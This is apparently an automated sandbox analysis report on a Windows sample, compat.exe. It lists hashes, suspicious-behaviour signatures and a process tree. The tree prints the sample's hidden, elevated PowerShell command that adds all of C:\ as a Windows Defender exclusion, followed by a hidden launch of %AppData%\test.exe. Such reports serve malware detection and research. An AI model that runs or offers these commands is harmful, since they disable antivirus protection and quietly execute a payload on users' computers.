Analysis
-
max time kernel
45s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
09-10-2022 06:40
Static task
static1
Behavioral task
behavioral1
Sample
compat.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
compat.exe
Resource
win10v2004-20220812-en
General
-
Target
compat.exe
-
Size
2.3MB
-
MD5
762cb6a485d80bb9bfe03b41dea15d0c
-
SHA1
82bfac0067037ff3bd4e01cc1f3a9b38eea0762f
-
SHA256
c8be9798b47ba613eac093efd3d045c99aad97bd255172ac2e59687db71ad25f
-
SHA512
b08180f85f0945572e2ce426caa7c7848bc79c8b80424d207bec9b340826d0f9b5622472f53faba53126d4e4d2198586c135393c574064588d9a38169e500cac
-
SSDEEP
49152:DiubKxC3aujrb/ThvO90d7HjmAFd4A64nsfJ5y4gXG/jpCF11z1:13LwA
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 976 powershell.exe 976 powershell.exe 976 powershell.exe 432 powershell.exe 1580 powershell.exe 1580 powershell.exe 1580 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 976 powershell.exe Token: SeDebugPrivilege 432 powershell.exe Token: SeDebugPrivilege 1580 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1064 wrote to memory of 976 1064 compat.exe 27 PID 1064 wrote to memory of 976 1064 compat.exe 27 PID 1064 wrote to memory of 976 1064 compat.exe 27 PID 976 wrote to memory of 1492 976 powershell.exe 29 PID 976 wrote to memory of 1492 976 powershell.exe 29 PID 976 wrote to memory of 1492 976 powershell.exe 29 PID 1492 wrote to memory of 432 1492 cmd.exe 31 PID 1492 wrote to memory of 432 1492 cmd.exe 31 PID 1492 wrote to memory of 432 1492 cmd.exe 31 PID 1492 wrote to memory of 300 1492 cmd.exe 32 PID 1492 wrote to memory of 300 1492 cmd.exe 32 PID 1492 wrote to memory of 300 1492 cmd.exe 32 PID 1064 wrote to memory of 1580 1064 compat.exe 33 PID 1064 wrote to memory of 1580 1064 compat.exe 33 PID 1064 wrote to memory of 1580 1064 compat.exe 33 PID 1580 wrote to memory of 1100 1580 powershell.exe 35 PID 1580 wrote to memory of 1100 1580 powershell.exe 35 PID 1580 wrote to memory of 1100 1580 powershell.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\compat.exe"C:\Users\Admin\AppData\Local\Temp\compat.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "Start-Process cmd \\\"/k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\\excluded.txt 1\" -Verb RunAs -WindowStyle hidden -ErrorAction SilentlyContinue"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" \/k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\\excluded.txt 13⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath 'C:\'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
C:\Windows\system32\fsutil.exefsutil file createnew C:\Users\Admin\AppData\Roaming\\excluded.txt 14⤵PID:300
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "Start-Process cmd \\\"/k start %AppData%\\test.exe\" -WindowStyle hidden"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" \/k start %AppData%\\test.exe3⤵PID:1100
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD59debf3826821ee4a2fe69789c79e5e66
SHA1ae68cd5410ff7bb5f4b0af4a4dea6fb45555b1ff
SHA256b4c09c80955a9e8187d426a1d2a4638f292390952a219e08935e6c543ce58e7a
SHA512a644e40baa419ecfaff6cb3ada7f3da3d937d8a7befbe49340c2b6e760de55b97ddda85c7dfaf7825c30d5c69441a9c619b49c6767f407159da33be646ecb42e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD59debf3826821ee4a2fe69789c79e5e66
SHA1ae68cd5410ff7bb5f4b0af4a4dea6fb45555b1ff
SHA256b4c09c80955a9e8187d426a1d2a4638f292390952a219e08935e6c543ce58e7a
SHA512a644e40baa419ecfaff6cb3ada7f3da3d937d8a7befbe49340c2b6e760de55b97ddda85c7dfaf7825c30d5c69441a9c619b49c6767f407159da33be646ecb42e